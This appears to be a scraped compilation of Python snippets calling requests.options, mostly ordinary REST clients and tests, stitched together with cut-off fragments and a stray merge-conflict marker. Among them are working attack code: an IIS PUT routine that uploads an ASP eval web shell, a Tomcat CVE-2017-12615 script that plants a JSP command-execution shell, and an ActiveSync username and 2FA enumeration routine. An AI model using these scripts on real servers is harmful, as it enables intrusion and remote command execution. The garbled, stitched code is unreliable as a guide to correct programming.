Example #1
0
def findPuttable():
    #Find directories which are puttable
    headers = {'user-agent': random.choice(agents).strip(),}
    paths = []
    try:
        for url in foundURLs:
                urlPath = url.split('/')
                if len(urlPath) > 3:
                    urlPath.pop()
                newURL = '/'.join(urlPath)
                if newURL not in paths:
                    paths.append(newURL)
        for path in paths:
            resp = None
            if authed:
                resp = requests.options(path, auth=HttpNtlmAuth(username, password),headers=headers)
            else:
                resp = requests.options(path,headers=headers)

            if resp is not None and resp.status_code == 200:
                if 'allow' in resp.headers:
                    printer('[+] PUT - %s' % (path), GREEN)

    except Exception, e:
        print e
def upload(file2Upload):
    """"""
    #Read Cookie.....Damn it I didn't have my supper!
    try:
        cookies = open(cookiepath, 'r').readline()
        #print(cookies)
    except:
        print('I am hungry, please give me your Cookie!')
        exit()
    #Get filename
    if not os.path.isfile(file2Upload):
        print('Not file!')
        pass    
    if os.path.splitext(file2Upload)[1] != '.flv':
        print('ERROR: You can only upload .flv file(s)!')
        exit()
    filename = os.path.basename(file2Upload)
    #print(filename)
    #Calculate Filesize, since there s 1.4GiB limit
    filesize = os.path.getsize(file2Upload)
    print('Size of file: ' + str(filesize))
    if filesize > (1.4 * 1024 * 1024 * 1024):
        print('File larger than 1.4 GiB, unable to upload!')
        exit()
    #Fetch UploadUrl
    request_full = urllib.request.Request('http://member.bilibili.com/get_vupload_url', headers={ 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36', 'Cache-Control': 'no-cache', 'Pragma': 'no-cache' , 'Cookie': cookies,})
    try:
        response = urllib.request.urlopen(request_full)
    except Exception:
        print('Cannot get response from server!')
        pass
    data = response.read()
    uploadresponse = json.loads(data.decode('utf-8'))
    try:        # if error happens...
        uploadresponse["error_code"]
    except KeyError:
        pass
    except:
        print('ERROR: '+ uploadresponse['error_msg'] + ', ' + str(uploadresponse["error_code"]))
        sys.exit() # exit the program
    #print(uploadresponse['url'])
    #make filename
    server_ip = str(uploadresponse['server_ip'])
    remote_file_name = str(uploadresponse['file_name'])
    #start upload
    upload_url = str(uploadresponse['url'])
    #print(upload_url)
    f = open(file2Upload, 'rb')
    c = 0
    for piece in read_in_chunks(f):
        headers_post = {'content-type': 'multipart/form-data', 'Content-Length': '524288', 'Content-Range': 'bytes ' + str(c * 524288) + '-' + str((c + 1) * 524288) + '/' + str(filesize),}
        requests.options(upload_url)  #dont really know why
        files = {'file': piece}
        r = requests.post(upload_url, files=files, headers = headers_post)
        c = c + 1
        
        print(str(c * 524288) + '/' + str(filesize) + ' done...')
    #video_list = video_list + (str('[vupload]' + remote_file_name + ';' + filename + ';' + server_ip + ';[/vupload]\n'))
    print('\n'+'Hope everything is fine. '+ '\n' + '[vupload]' + remote_file_name + ';' + filename + ';' + server_ip + ';[/vupload]')
 def __init__(self, host):
     self.host = host
     self.session = requests.Session()
     try:
         # Run a request to trigger request's imports.
         # We don't care if it works
         requests.options(self.host)
     except:
         pass
def check_user(url, user, password, timeout):
    """Exploit the difference in HTTP responses from the ActiveSync service to identify valid and invalid usernames.
    It was also identified that valid accounts with 2FA enabled can be distinguished from valid accounts without 2FA."""
    headers = {"MS-ASProtocolVersion": "14.0"}
    auth = (user, password)
    try:
        r = requests.options(url, headers=headers, auth=auth, timeout=timeout)
    except Exception as e:
        msg = "error checking {} : {}".format(user, e)
        if MSF:
            module.log(msg, "error")
        else:
            logging.error(msg)
        return user, UNKNOWN, None
    status = r.status_code
    if status == 401:
        return user, password, VALID_USER, r
    elif status == 404:
        if r.headers.get("X-CasErrorCode") == "UserNotFound":
            return user, password, INVALID_USER, r
    elif status == 403:
        return user, VALID_PASSWD_2FA, r
    elif status == 200:
        return user, password, VALID_LOGIN, r
    return user, password, UNKNOWN, r
Example #5
0
def run_request(base_url, url, method="GET", data=None, verbose=False):
    """
    Run HTTP request and return the result.
    """
    if method not in ("GET", "HEAD", "OPTIONS", "POST", "PUT", "PATCH", \
        "DELETE"):
        if verbose:
            print_error("Unknown method")
        return None
    full_url = urlparse.urljoin(base_url, url)
    if verbose:
        print_info("Request url=%s" % (full_url))
        print_info("Request method=%s" % (method))
        if data is not None:
            print_info("Request body=%s" % (data))
    try:
        response = None
        if method == "DELETE":
            response = requests.delete(full_url, data=data)
        elif method == "HEAD":
            response = requests.head(full_url, data=data)
        elif method == "OPTIONS":
            response = requests.options(full_url, data=data)
        elif method == "POST":
            response = requests.post(full_url, data=data)
        elif method == "PUT":
            response = requests.put(full_url, data=data)
        elif method == "PATCH":
            response = requests.patch(full_url, data=data)
        else:
            response = requests.get(full_url, data=data)
        if verbose:
            print_info("Response code=%d" % (response.status_code))
            print_info("Response body=%s" % (response.content))
            print_info("Response headers=%s" % (response.headers))
        return response
    except requests.exceptions.ConnectionError:
        if verbose:
            print_error("Network problem occurred")
        return None
    except requests.exceptions.HTTPError:
        if verbose:
            print_error("Invalid HTTP response")
        return None
    except requests.exceptions.URLRequired:
        if verbose:
            print_error("Invalid request URL")
        return None
    except requests.exceptions.TooManyRedirects:
        if verbose:
            print_error("Too many redirects")
        return None
    except requests.exceptions.Timeout:
        if verbose:
            print_error("Connection timed out")
        return None
    except requests.exceptions.MissingSchema:
        if verbose:
            print_error("Invalid request URL")
        return None
Example #6
0
    def options(self, uri, params=None, headers=None):

        if headers is None:
            headers = dict()
            headers.update(self._headers)

        return requests.options(self._url + uri, params=params, headers=headers)
def OPTIONS(HOST, path='/', PORT=80):
	opt = re.compile('Allow.*(GET).*')
	request_str = 'options ' + path + ' HTTP/1.1 \r\nuser-agent: MyAwesomeCrawler\r\nconnection: close\r\n\r\n'
	# url = urlparse.urlparse(HOST)
	# path = url.path
	# if path == "":
		# path = "/"
	# HOST = url.netloc  # The remote host
	# create an INET, STREAMing socket
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.settimeout(0.30)
	s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	# s.setblocking(0)
	s.connect((HOST, PORT))
	# s.send("GET / HTTP/1.1%s" % ('\r\n\r\n'))
	s.send(request_str)
	data = (s.recv(1000000))
	# print(data)
	# https://docs.python.org/2/howto/sockets.html#disconnecting
	s.shutdown(1)
	s.close()
	# print('Received', repr(data))
	r = requests.options('http://' + HOST + path, headers={'user-agent':'CLIENT RIW'})
	print(r.headers)
	return 1 if re.search(opt, str(r.headers)) else 0
Example #8
0
 def test_can_only_POST_to_upload_URL(self):
     response = requests.get(self.VIDEO_UPLOAD_URL)
     self.assertEqual(response.status_code, 405)
     response = requests.options(self.VIDEO_UPLOAD_URL)
     self.assertEqual(response.status_code, 405)
     response = requests.put(self.VIDEO_UPLOAD_URL)
     self.assertEqual(response.status_code, 405)
    def options(self):
        """
        Retrieves documentation of REST resource.

        If the status code is 200 (OK), returns the documentation.  Otherwise,
        returns an error.

        The response is an object with the following attributes:

        +------------+------------------------+
        | Attribute  | Description            |
        +============+========================+
        | headers    | Response headers       |
        +------------+------------------------+
        | data       | Resource documentation |
        +------------+------------------------+

        Link resources are not included in the documentation.

        :returns: Resource documentation data.
        :rtype: ``EasyDict`` object.
        """
        uri = "%s%s" % (self.base_uri, self.endpoint)

        resp = requests.options(uri,params=self.auth)

        if resp.status_code == 200:
            return Response(self.base_uri, self.auth, resp)
        else:
            raise SoccermetricsRestException(resp.status_code,resp.url)
Example #10
0
 def test_documentation_siteroot_options(self):
     response = requests.options(
         self.portal.absolute_url(),
         headers={'content-type': 'application/json'},
         auth=(SITE_OWNER_NAME, SITE_OWNER_PASSWORD)
     )
     save_response_for_documentation('siteroot-options.json', response)
    def testGetWildcard(self):
        # set the Cors header
        requests.post(
            self.url + "/foo",
            headers={
                'X-Auth-Token': self.tokenId,
                'X-Container-Meta-Access-Control-Allow-Origin': '*',
            }).raise_for_status()

        # check if the cors header was stored
        response = requests.get(
            self.url + "/foo",
            headers={
                'X-Auth-Token': self.tokenId,
            })

        response.raise_for_status()
        self.assertEqual(response.status_code, 200)
        self.assertEqual(
            response.headers['X-Container-Meta-access-control-allow-origin'],
            '*')

        # set the Cors header
        response = requests.options(
            self.url + "/foo/a",
            headers={
                'X-Auth-Token': self.tokenId,
                'Origin': 'http://www.foo.com',
                'Access-Control-Request-Method': 'GET',
            })

        self.assertEqual(response.status_code, 200)
Example #12
0
def main():

    print('Создаем объект Response, вызывая метод HTTP GET')
    response_object = requests.get(BASE_URL + HTTP_METHOD['GET'])

    # декодированный текст ответа
    print('{}'.format(response_object.text))

    print('Создаем объект Response, вызывая метод HTTP PUT')
    response_object = requests.put(BASE_URL + HTTP_METHOD['PUT'])

    # декодированный текст ответа
    print('{}'.format(response_object.text))

    print('Создаем объект Response, вызывая метод HTTP DELETE')
    response_object = requests.delete(BASE_URL + HTTP_METHOD['DELETE'])

    # декодированный текст ответа
    print('{}'.format(response_object.text))

    print('Создаем объект Response, вызывая метод HTTP HEAD')
    response_object = requests.head(BASE_URL + HTTP_METHOD['HEAD'])

    # декодированный текст ответа
    print('{}'.format(response_object.text))

    print('Создаем объект Response, вызывая метод HTTP OPTIONS')
    response_object = requests.options(BASE_URL + HTTP_METHOD['OPTIONS'])

    # декодированный текст ответа
    print('{}'.format(response_object.text))
Example #13
0
File: main.py Project: Chive/pyrate
    def do_request(self, http_method, url, headers, body, return_format):

        if self.auth_type == 'OAUTH1':
            auth_data = self.get_oauth()
        else:
            auth_data = None

        if self.send_json:
            # We need to make sure that body is jsonified
            try:
                body = json.dumps(body)
            except TypeError or ValueError:
                pass

        if http_method.upper() == 'GET':
            r = requests.get(url, headers=headers, auth=auth_data)

        elif http_method.upper() == 'POST':
            r = requests.post(url, data=body, headers=headers, auth=auth_data)

        elif http_method.upper() == 'PUT':
            r = requests.put(url, data=body, headers=headers, auth=auth_data)

        elif http_method.upper() == 'DELETE':
            r = requests.delete(url, data=body, headers=headers, auth=auth_data)

        elif http_method.upper() == 'OPTIONS':
            r = requests.options(url, data=body, headers=headers, auth=auth_data)

        else:
            raise Exception("Invalid request method")

        return self.handle_response(r, return_format)
    def requests(self, data):
        args = comun.to_dict(data.Args)
        info = comun.to_dict(data.Data)
        if data.Method == 'get':
            params = comun.to_dict(data.Params)
            r = requests.get(data.Url, params, **args)
        elif data.Method == 'post':
            json = comun.to_dict(data.Json)
            r = requests.post(data.Url, info, json, **args)
        elif data.Method == 'options':
            r = requests.options(data.Url, **args)
        elif data.Method == 'head':
            r = requests.head(data.Url, **args)
        elif data.Method == 'put':
            r = requests.put(data.Url, info, **args)
        elif data.Method == 'patch':
            r = requests.patch(data.Url, info, **args)
        elif data.Method == 'delete':
            r = requests.delete(data.Url, **args)

        res = Response()
        res.StatusCode = r.status_code
        res.Url = r.url
        res.Encoding = str(r.encoding)
        res.Headers = str(r.headers)
        res.Cookies = str(r.cookies)
        res.Text = r.text
        try:
            res.Json = str(r.json())
        except ValueError:
            res.Json = ''
        res.Content = r.content
        return res
Example #15
0
def _curl(protocol,target,i,timeout=3,searchList=[]):
    dic = {}
    dic['id'] = str(i)
    dic['host'] = target.split(':')[0]
    dic['search'] = []
    url = protocol + "://" +target.strip(' ')
    try:
        result = requests.get(url, timeout=int(timeout),verify=False)
        soup = BeautifulSoup(result.text,'lxml')
        dic['target'] = url
        dic['status'] = str(result.status_code)
        dic['flag'] = True
        dic['host'] = target
        mytitle =  soup.title.string
        content =  result.text
        for searchkey in searchList:
            if searchkey in mytitle.encode(result.encoding) or searchkey in content.encode(result.encoding):
                dic['search'].append(searchkey)
        if mytitle == None or mytitle =='':
            dic['title'] = "None Title"
        else:
            dic['title'] =  mytitle.encode(result.encoding)
    except:
        dic['title'] = "Curl Failed"
        dic['status'] = "0"
        dic['target'] = target
        dic['host'] = target
        dic['flag'] = False
    url = protocol + "://" +target.strip(' ')
    try:
        result1 = requests.options(url+"/testbyah", verify=False,timeout=int(timeout))
        dic['head_allow'] = result1.headers['Allow']
    except:
        dic['head_allow'] = "Not Allow"
    return dic
Example #16
0
 def test_mocker_options(self, m):
     mock_obj = m.options(self.URL, text=self.TEXT)
     self.assertResponse(requests.options(self.URL))
     self.assertTrue(mock_obj.called)
     self.assertTrue(mock_obj.called_once)
     self.assertTrue(m.called)
     self.assertTrue(m.called_once)
Example #17
0
def req(param, header, total_time_list, length_list):
    try:
        url, method, data = param
        start = time.time()
        if method == 'GET':
            r = requests.get(url)
        elif method == 'POST':
            data = data_parse(data)
            r = requests.post(url, data)
        elif method == 'DELETE':
            r = requests.delete(url)
        elif method == 'PUT':
            data = data_parse(data)
            r = requests.put(url, data)
        elif method == 'HEAD':
            r = requests.head(url)
        elif method == 'OPTIONS':
            r = requests.options(url)

        #print r.content
        total_time = time.time() - start
        if r.ok:
            if not header['server']:
                header['server'] = r.headers['Server'] if 'Server' in r.headers else 'unknown'
            if 'Content-Length' in r.headers:
                length = float(r.headers['Content-Length'])
            else:
                length = len(r.content)
            total_time_list.append(total_time)
            length_list.append(length)
    except Exception, e:
        logging.warn('request failed, domain:%s ; :%s' % (url, e), exc_info=1)
Example #18
0
def run(target):
    "IIS PUT"
    results = []
    url = "http://" + target + "/"

    try:
        r = requests.options(url, timeout=5)
    except Exception:
        pass
    else:
        r.close()
        if r.headers.get("public") and r.headers.get("allow") and "PUT" in r.headers.get("public"):
                try:
                    r = requests.put(url+"test.txt", data='<%eval request("chu")%>', timeout=5)
                except Exception:
                    pass
                else:
                    r.close()
                    if r.status_code < 400:
                        try:
                            r = requests.request(method="MOVE",
                                                 url=url+"test.txt",
                                                 headers={"Destination":url+"test.asp;.jpg"},
                                                 timeout=5
                            )
                        except Exception:
                            pass
                        else:
                            r.close()
                            if r.status_code < 400:
                                results.append(url+"test.asp;.jpg")

    return results
Example #19
0
    def request(self):
        resposta = ''
        try:
            metodo = self.metodo.get()
            headers = self.get_headers()
            if metodo == Rest.POST:
                data = self.get_data()
                resposta = r.post(self.url.get(), headers=headers, data=data)
            elif metodo == Rest.GET:
                resposta = r.get(self.url.get(), headers=headers)
            elif metodo == Rest.PUT:
                data = self.get_data()
                resposta = r.put(self.url.get(), headers=headers, data=data)
            elif metodo == Rest.DELETE:
                resposta = r.delete(self.url.get(), headers=headers)
            elif metodo == Rest.OPTIONS:
                resposta = r.options(self.url.get(), headers=headers)
            elif metodo == Rest.TRACE:
                resposta = r.trace(self.url.get(), headers=headers)
            elif metodo == Rest.HEAD:
                resposta = r.head(self.url.get(), headers=headers)
        except Exception as ex:
            print(ex)
            resposta = ex.message
        self.tratar_resposta(resposta)

        self.retorno.delete(0.0,tkinter.END)
        try:
            load = json.loads(resposta.text)
            self.retorno.insert(tkinter.END, json.dumps(load, indent=4, sort_keys=True) )
        except:
            soup = BeautifulSoup(resposta.text)
            self.retorno.insert(tkinter.END, soup.prettify() )
Example #20
0
 def test_can_only_GET_from_poll_URL(self):
     response = requests.post(self.POLL_URL)
     self.assertEqual(response.status_code, 405)
     response = requests.options(self.POLL_URL)
     self.assertEqual(response.status_code, 405)
     response = requests.put(self.POLL_URL)
     self.assertEqual(response.status_code, 405)
Example #21
0
 def options(self, path, params={}):
     headers = {'Accept': 'application/json', 'User-Agent':
                self.SDK_VERSION, 'Content-type': 'application/json'}
     uri = self.make_path(path)
     response = requests.options(
         uri, params=urlencode(params), headers=headers)
     return response
Example #22
0
 def rest_req(self, action="GET", path="", data=None, timeout=10):
   if path[0] == "/":
     path = path[1:len(path)]
   url = "/".join([self.rest_url, path])
   headers = {"Accept": "application/json", "Content-type": "application/json"}
   if type(data) is dict:
     data = json.dumps(data)
   print data
   if action == "POST":
     req = requests.post(url, data=data, auth=(self.rest_username, self.rest_password), headers=headers)
   elif action == "PUT":
     req = requests.put(url, data=data, auth=(self.rest_username, self.rest_password), headers=headers)
   elif action == "DELETE":
     req = requests.delete(url, data=data, auth=(self.rest_username, self.rest_password), headers=headers)
   elif action == "HEAD":
     req = requests.head(url, data=data, auth=(self.rest_username, self.rest_password), headers=headers)
   elif action == "OPTIONS":
     req = requests.options(url, auth=(self.rest_username, self.rest_password), headers=headers)
   else:  # Assume GET
     req = requests.get(url, auth=(self.rest_username, self.rest_password), headers=headers)
   if req.status_code == 200:
     if len(req.text) > 0:
       return req.json()
     else:
       return {}
   else:
     print req.content
     req.raise_for_status()
 def test_method_options(self):
     r = requests.options(self.login_url, data = {
         'mob': self.mob,
         'code': '123456'
     })
     self.assertEqual(r.status_code, 200,
         msg = 'response status code equals to 200 use method options.')
Example #24
0
    def request(self, method, request="?", headers=None, postData={}, domain="discordapp.com", files={}):
        while(time.time() - self.lastRequest < 1):
            time.sleep(0.025)

        url = 'https://{}/api/{}'.format(domain, request)
        response = None

        if(method.lower() in ["post", "get", "delete", "head", "options", "put"]):
            self.lastRequest = time.time()
            if(method == "POST"):
                response = requests.post(url, files=files, json=postData, headers=headers)
            elif(method == "GET"):
                response = requests.get(url, postData, headers=headers)
            elif(method == "PUT"):
                response = requests.put(url, postData, headers=headers)
            elif(method == "DELETE"):
                response = requests.delete(url, postData, headers=headers)
            elif(method == "OPTIONS"):
                response = requests.options(url)
            elif(method == "HEAD"):
                response = requests.head(url)
            elif(method == "UPDATE"):
                response = requests.update(url, postData, headers=headers)
        else:
            raise Exception("Invalid HTTP request method")

        if(response.status_code not in range(200, 206)):
            raise Exception("API responded with HTTP code  " + str(response.status_code) + "\n\n" + response.text)
        else:
            if(response.text):
                returnData = json.loads(response.text)

                return returnData
            else:
                return None
Example #25
0
def get_options_information(url):
	"""
	Make an OPTIONS HTTP request and try to find useful information 
	"""
	# banner_print("HTTP OPTIONS",1)
	details = {}
	interesting_methods = []
	allowed_methods = []

	try:
		option = requests.options(url,allow_redirects=args.follow_redirects,verify=args.verify_cert,headers=useragent,timeout=1)			
		allowed_methods = [method.strip() for method in option.headers['allow'].split(",")]	
	except:
		return None
	else:
		for method in allowed_methods:
			if method not in known_methods:
				interesting_methods.append(method)
		if interesting_methods:
			n_print("Interesting HTTP Methods:")
			details['interesting-methods'] = interesting_methods
			good_print("\t"+",".join(interesting_methods))
		if 'dav' in option.headers:
			good_print("WebDAV Enabled " + option.headers['dav'])
			details['webdav'] = option.headers['dav']
		return details
Example #26
0
    def get_options(self, url, method):
        """
        Contact the LISA API to know the format of arguments
        :param url: The url to call for the options
        :param method: The method which will be used for the Intent
        :return: A dictionnary of arguments and their type of field
        """
        url_dict = {}
        for outcome in self.nlp_json['outcomes']:
            for entity in outcome['entities']:
                plugin, intent = entity.split('_', 1)
                url_dict[intent] = outcome['entities'][entity][0]['value']

        self.lisa_api_intent = ''.join([self.lisa_api_url, url]).format(**url_dict)

        r = requests.options(self.lisa_api_intent,
                             headers={"Authorization": self.lisa_auth,
                                      "content-type": "application/json"})
        options = r.json()
        self.parsed_args = {}

        if method.upper() in options['actions']:
            for argument in options['actions'][method.upper()]:
                value = self._get_info_field(options['actions'][method.upper()][argument])
                if value:
                    self.parsed_args[argument] = value
        return self.parsed_args
Example #27
0
 def api_request(self, api_module, view_name, method='GET', headers=None, payload=None, files=None, auth=None):
     """
     :param api_module: the api module instantiated on the given instance
     :param view_name: a view in the given api module
     :param method: the HTTP request method. defaults to GET
     :param payload: any data that needs to be sent to the view. defaults to None. should be a dict
     :return: returns the response content or json depending on the response content-type
     """
     url = 'https://%s.nebrios.com/api/v1/%s/%s' % (self.instance_name, api_module, view_name)
     r = None
     if method == 'POST':
         r = requests.post(url, data=payload, files=files, headers=headers, auth=auth)
     elif method == 'GET':
         r = requests.get(url, params=payload, headers=headers, auth=auth)
     elif method == 'PUT':
         r = requests.put(url, data=payload, headers=headers, auth=auth)
     elif method == 'DELETE':
         r = requests.delete(url, headers=headers, auth=auth)
     elif method == 'HEAD':
         r = requests.head(url, headers=headers, auth=auth)
     elif method == 'OPTIONS':
         r = requests.options(url, headers=headers, auth=auth)
     else:
         return 'Incorrect Method.'
     print r
     if 'application/json' in r.headers['content-type']:
         return r.json()
     return r.content
Example #28
0
    def test_proxy_fetch_options_request(self, scheme):
        expected_origin = '{0}://example.com'.format(scheme)
        res = requests.options('{0}://pywb.proxy/proxy-fetch/{1}'.format(scheme, expected_origin),
                               headers=dict(Origin=expected_origin),
                               proxies=self.proxies, verify=self.root_ca_file)

        assert res.ok
        assert res.headers.get('Access-Control-Allow-Origin') == expected_origin
Example #29
0
    def test_proxy_worker_options_request(self, scheme):
        expected_origin = '{0}://example.com'.format(scheme)
        res = requests.options('{0}://pywb.proxy/static/autoFetchWorkerProxyMode.js'.format(scheme),
                               headers=dict(Origin=expected_origin),
                               proxies=self.proxies, verify=self.root_ca_file)

        assert res.ok
        assert res.headers.get('Access-Control-Allow-Origin') == expected_origin
Example #30
0
    def check_webdav(self):

        headers = {
                'Host': 'www.beihua.edu.cn'
                }

        response = requests.options('http://www.beihua.edu.cn', headers=headers)
        print response.headers
import sys, requests
import json

host = "http://localhost:10000/wikispeech/"

r = requests.options(host)
api_info = r.json()
supported_languages = api_info["GET"]["parameters"]["lang"]["allowed"]


def test_default_settings():
    #1) Test default settings for supported languages
    for lang in supported_languages:
        print("START: %s" % lang)

        # GET:  curl "http://localhost:10000/wikispeech/?lang=en&input=test."
        r = requests.get("%s?lang=%s&input=test." % (host, lang))
        print(r.text)
        print("DONE: %s" % lang)


def test_all_settings():

    #2) Test all settings for supported languages.
    #foreach language
    #foreach textproc_config
    #foreach voice
    #test
    for lang in supported_languages:
        print("START: %s" % lang)
Example #32
0
 def test_mocker_options(self, m):
     mock_obj = m.options(self.URL, text=self.TEXT)
     self.assertResponse(requests.options(self.URL))
     self.assertTrue(mock_obj.called)
#
#  Contributors:
#      Pavel Tisnovsky
#

import requests
import json

# adresa s testovaci REST API sluzbou
URL = "https://httpbin.org/get"

# hlavicka posilana v dotazu
headers = {'accept': 'application/json'}

# poslani HTTP dotazu typu OPTIONS
response = requests.options(URL, headers=headers)

# precteni hlavicek
headers = response.headers

# vypis vsech hlavicek
print("Headers:")

for header_name, header_value in headers.items():
    print("{:40s} {}".format(header_name, header_value))

print("-" * 60)

print("Content:")

# vypis tela odpovedi
Example #34
0
        return "http://" + ur


url = raw_input("Enter an URL: ")
url = addhttp(url)

flag = True
getbool = True
try:
    rget = requests.get(url)
except:
    getbool = False
    print "GET Err"

try:
    roption = requests.options(url)
except:
    print "OPTIONS Err"
while flag:
    if (getbool == True):
        print "\n\n\n\n"
        print "0. Show all\n1. Show server application\n2. Show list of methods\n3. Show list of cookies\n4. Show cache information\n5. Show authentication information\n6. Show status\n7. Show type of connection\n8. End\n9. Change URL"
        num = input("Choose a number: ")
        print "\n"
    else:
        getbool = True
        num = 9

    if (num == 1 or num == 0):
        try:
            print "server app: ", rget.headers['server']
Example #35
0
def is_deployment_available(params):
    url = get_deployment_url(params)
    response = requests.options(url)
    return response.status_code == 200
Example #36
0
 def get_upload_id(url):
     requests.options(url, headers=headers_op("POST"))
     resp = requests.post(url, headers=headers_up()).json()
     return resp["UploadId"]
 def http_其他请求类型():
     r = requests.post("http://httpbin.org/post")
     r = requests.put("http://httpbin.org/put")
     r = requests.delete("http://httpbin.org/delete")
     r = requests.head("http://httpbin.org/get")
     r = requests.options("http://httpbin.org/get")
Example #38
0
import requests
html = requests.options("https://image.baidu.com/search/acjson?tn=resultjson_com&ipn=rj&ct=201326592&is=&fp=result&queryWord=%E5%A3%81%E7%BA%B8&cl=2&lm=-1&ie=utf-8&oe=utf-8&adpicid=&st=-1&z=0&ic=0&hd=0&latest=0&copyright=0&word=%E5%A3%81%E7%BA%B8&s=&se=&tab=&width=&height=&face=0&istype=2&qc=&nc=1&fr=&expermode=&force=&cg=wallpaper&pn=30&rn=30&gsm=1e&1595690436389=")
# html.encoding="utf-8"
if html.status_code == 200:
    content = html.json()['data']
    for item in content:
        try:
            print(item['replaceUrl'][1]['ObjURL'])
        except:
            print("无原图")
# print(html.text)
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b,0,a));
        }
        out.print("</pre>");
    }
%>'''

if len(sys.argv) < 2:
    print "python tomcat-cve-2017-12615.py http://127.0.0.1:8080/"
    sys.exit()

url = sys.argv[1]

r = requests.options(url=url + '/123')
header = r.headers
#print header

if 'PUT' in header['Allow']:
    filename = '/' + str(random.randint(666, 666666)) + '.jsp/'
    #print filename
    r = requests.put(url=url + filename, data=body)
    #print r.status_code
    if r.status_code == 201:
        print 'create shell success: ' + url + filename[:-1]
    else:
        print 'error'
Example #40
0
def delete_request():
    print('\n***** DELETE request EXAMPLE  ***')
    resp = requests.options('https://httpbin.org/delete')
    print(httpstatus(resp.status_code))
    pprint(resp.text)
Example #41
0
def options_request():
    print('\n***** OPTIONS request, ACCESS CONTROL methods!!! ***')
    resp = requests.options('https://httpbin.org/get')
    pprint(type(resp))
    pprint(resp.headers)
Example #42
0
import requests
import json


r = requests.get('http://www.baidu.com/')#不带参数的get请求
r1 = requests.get('http://www.baidu.com/',params={'wd':'123'})#带参数的get请求

requests.post('http://www.baidu.com/',data=None,json=None)#post请求
requests.put('http://www.baidu.com/')#put请求
requests.delete('http://www.baidu.com/')#delete
requests.head('http://www.baidu.com/')
requests.options('http://www.baidu.com/')

# 为url传递参数
urlParams = {"key":'value'}
r = requests.get('http://www.baidu.com/',params=urlParams)
# print(type(r))
# print(r.url)# 打印url字符串 http://www.baidu.com/?key=value


# response
# print(r.encoding)#获取当前编码
# r.encoding = 'utf-8'#设置编码为utf-8
# print(r.text)#将encoding解析后的内容,字符串方式的响应体,会自动根据响应头部的字符编码进行解码
# print(r.content)#以字节形式返回,字节方式的响应体,会自动为你解码gzip和deflate压缩
# print(r.headers)#字典对象存储响应头,字典键不区分大小写,若键不存在则返回None
# print(r.status_code)
# print(r.raw)#返回原始响应体,也就是urllib的response对象,使用r.raw.read()
# print(r.ok)# 查看r.ok的布尔值,可以知道是否登录成功

# # 特殊方法
Example #43
0
    def res_upload(url, parts):
        requests.options(url, headers=headers_op("POST"))

        requests.post(url, headers=headers_res(), data=parts)
Example #44
0
def options(url, **kwargs):
    return requests.options(url, **kwargs)
Example #45
0
 def upload_file(self, url, file):
     requests.options(url, headers=headers_op("PUT"))
     requests.put(url,
                  headers=headers_up(self.get_size(self.video), "put"),
                  data=file)
Example #46
0
    params=[('q', 'requests+language:python')],
)
print(response.json())

# To customize headers, you pass a dictionary of HTTP headers to get() using the headers parameter.
response = requests.get(
    'https://api.github.com/search/repositories',
    params={'q': 'requests+language:python'},
    headers={'Accept': 'application/vnd.github.v3.text-match+json'},
)
print(response.json())

#
#
# Aside from GET, other popular HTTP methods include POST, PUT, DELETE, HEAD, PATCH, and OPTIONS.
# requests provides a method, with a similar signature to get(), for each of these HTTP methods
response = requests.post('https://httpbin.org/post', data={'key': 'value'})
# data takes a dictionary, a list of tuples, bytes, or a file-like object.
response = requests.put('https://httpbin.org/put', data={'key': 'value'})
response = requests.delete('https://httpbin.org/delete')
response = requests.head('https://httpbin.org/get')
response = requests.patch('https://httpbin.org/patch', data={'key': 'value'})
response = requests.options('https://httpbin.org/get')

# If, however, you need to send JSON data, you can use the json parameter.
# When you pass JSON data via json, requests will serialize your data and add the correct Content-Type header for you.
response = requests.post('https://httpbin.org/post', json={'key': 'value'})

# httpbin.org is a great resource created by the author of requests, Kenneth Reitz.
# It is a service that accepts test requests and responds with data about the requests.
           anchor=convert_text_to_anchor_url(example['title']),
           description=example['title'],
           parameter=endpoint['endpoint_parameter'])

    # build attribute description table
    markdown_output += '''
### Object Attributes

Attribute | Type | Readonly | Nullable | Has Default
--- | --- | --- | --- | ---
'''

    # make HTTP OPTIONS call to get object information
    url = config['api_base_url'] + endpoint['endpoint_url']
    response = requests.options(url,
                                auth=(username, password),
                                headers={'Origin': config['api_base_url']})

    # build attribute table
    attributes = response.json()
    attributes = collections.OrderedDict(sorted(attributes.items()))

    for attribute, value in attributes.iteritems():
        attr_type = value['type']
        if attr_type == 'uom' and value['unit']:
            attr_type += ': ' + convert_unit_name(value['unit'])
        readonly = '&bullet;' if value['read_only'] is True else '&nbsp;'
        nullable = '&bullet;' if value['nullable'] is True else '&nbsp;'
        has_default = '&bullet;' if value['has_default'] is True else '&nbsp;'
        markdown_output += '''`{attribute}` | {type} | {readonly} | {nullable} | {has_default}
'''.format(attribute=attribute,
Example #48
0
 def options(self, *args, **kwargs):
     return requests.options(*self.update_args(args),
                             **self.update_kwargs(kwargs))
Example #49
0
print g.read()


# print "this is for item in g:"
# for item in i:
#   print "me is here"
  
#   print item



=======
print requests.head(direct_dl)
print requests.get(direct_dl)
print requests.options(direct_dl)
print requests.put(direct_dl)
r = requests.head(direct_dl)

x = urllib.urlretrieve(direct_dl)
print "this is x:"
print x

print "this is for line in x:"
for line in x:
  print line

g = urllib.urlopen(direct_dl, 'r')


print "this is for item in g:"
Example #50
0
 def optionsRequest(self):
     resp = requests.options(self.main_page,
                             params=url_params,
                             proxies=proxies)
     print(resp)
import requests


r = requests.get('https://api.github.com/events')
print r

r = requests.post('http://httpbin.org/post', data = {'key':'value'})
print r

r = requests.put('http://httpbin.org/put', data = {'key':'value'})
print r

r = requests.delete('http://httpbin.org/delete')
print r

r = requests.head('http://httpbin.org/get')
print r

r = requests.options('http://httpbin.org/get')
print r
Example #52
0
import json
import requests
from commons.response import Response
from logging import getLogger

logger = getLogger(__name__)


REQUEST_METHODS = {
    'POST': lambda url, params, data, headers: requests.post(url, data=json.dumps(data), headers=headers),
    'GET': lambda url, params, data, headers: requests.get(url, params, headers=headers),
    'PUT': lambda url, params, data, headers: requests.put(url, data=json.dumps(data), headers=headers),
    'HEAD': lambda url, params, data, headers: requests.head(url, headers=headers),
